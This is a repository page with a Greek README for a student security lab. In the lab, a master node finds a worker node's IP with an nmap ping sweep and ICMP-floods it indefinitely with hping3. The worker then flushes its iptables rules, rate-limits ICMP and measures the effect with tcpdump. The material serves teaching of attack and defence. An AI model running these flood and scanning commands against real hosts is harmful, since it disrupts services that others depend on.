Panagiotis_Klironomos
/
SwarmLabSec_LabProject
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
15 Commits
1 Branch
0 Tags
76 KiB
 
Branch: main
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from 'main'
${ noResults }
SwarmLabSec_LabProject/1)Ddos_Attack
PanagiotisKlironomos a5f05544dc
Update README.md 		3 years ago
..
README.md Update README.md 3 years ago
master.sh Add files via upload 3 years ago
worker1.sh Add files via upload 3 years ago

README.md

master.sh

Εδώ ο master node θα κάνει Ddos επίθεση στον worker_1 node. Το εργαλείο που χρησιμοποιείται για την επίθεση είναι το hping3.

  • Αφού γίνει εγκατάσταση του εργαλείου στον master κόμβο

    • sudo apt update
    • sudo apt upgrade -y
    • sudo apt install hping3 -y

  • Και αναγνώριση της IP του worker κόμβου από τον master

    • network=$(ifconfig | grep inet | sed -n 1p | awk "{print $2}" | cut -f 1-3 -d "." | sed 's/$/.*/')
    • worker1IP=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')

  • Ξεκινάει η επίθεση επ' αόριστον

    • sudo hping3 -p 80 --flood --icmp $worker1IP

    DDos_Master_Node

asciicast

worker1.sh

Εδώ ο worker node εφαρμόζει αντίμετρα στην Ddos επίθεση που δέχεται από τον master node μέσω του εργαλείου iptables και tcpdump (για monitoring).

  • Αφού γίνει εγκατάσταση του εργαλείου στον worker κόμβο (το iptables είναι ήδη εγκατεστημένο)
    • sudo apt update
    • sudo apt upgrade -y
    • sudo apt install tcpdump -y
  • Και αποθήκευση της IP του worker κόμβου σε μία μεταβλητή
    • worker1IP=$(ifconfig|grep inet|sed -n 1p|awk "{print $2}")
  • Γίνεται reset του configuration του Iptables ώστε να δούμε ξεκάθαρα την επίδραση που έχει η επίθεση που δεχόμαστε.
    • sudo iptables -F
  • Κάνουμε monitor τις απαντήσεις που στέλνονται από τον worker1 στον master (Icmp replies) για 2 δευτερόλεπτα. Κάνουμε monitor στις απαντήσεις και όχι στα εισερχόμενα ICMP πακέτα διότι ανάμεσα στον worker και στον master παρεμβάλλεται το firewall. Έτσι παρατηρώντας τις απαντήσεις που είναι ισάριθμες των εισερχόμενων πακέτων, έχουμε ξεκάθαρη εικόνα του πλήθους των πακέτων καθώς το firewall βρίσκεται τοπολογικά μετά τον worker και άρα δεν εμπλέκεται στο monitoring των απαντήσεων.
    • sudo timeout 2s tcpdump -i eth0 icmp and src $worker1IP
  • Εφαρμόζουμε στην συνέχεια κανόνες μέσω του Iptables επιτρέποντας μόνο ένα εισερχόμενο ICMP πακέτο ανά ένα δευτερόλεπτο.
    • sudo iptables -N icmp_flood
    • sudo iptables -A INPUT -p icmp -j icmp_flood
    • sudo iptables -A icmp_flood -m limit --limit 1/s --limit-burst 3 -j RETURN
    • sudo iptables -A icmp_flood -j DROP
  • Τέλος, κάνουμε monitor τις απαντήσεις που στέλνονται από τον worker1 στον master (Icmp replies) για 5 δευτερόλεπτα και η διαφορά στο πλήθος που θα παρατηρηθεί είναι εμφανώς μεγάλη.
    • sudo timeout 5s tcpdump -i eth0 icmp and src $worker1IP

DDos_Worker_Node

asciicast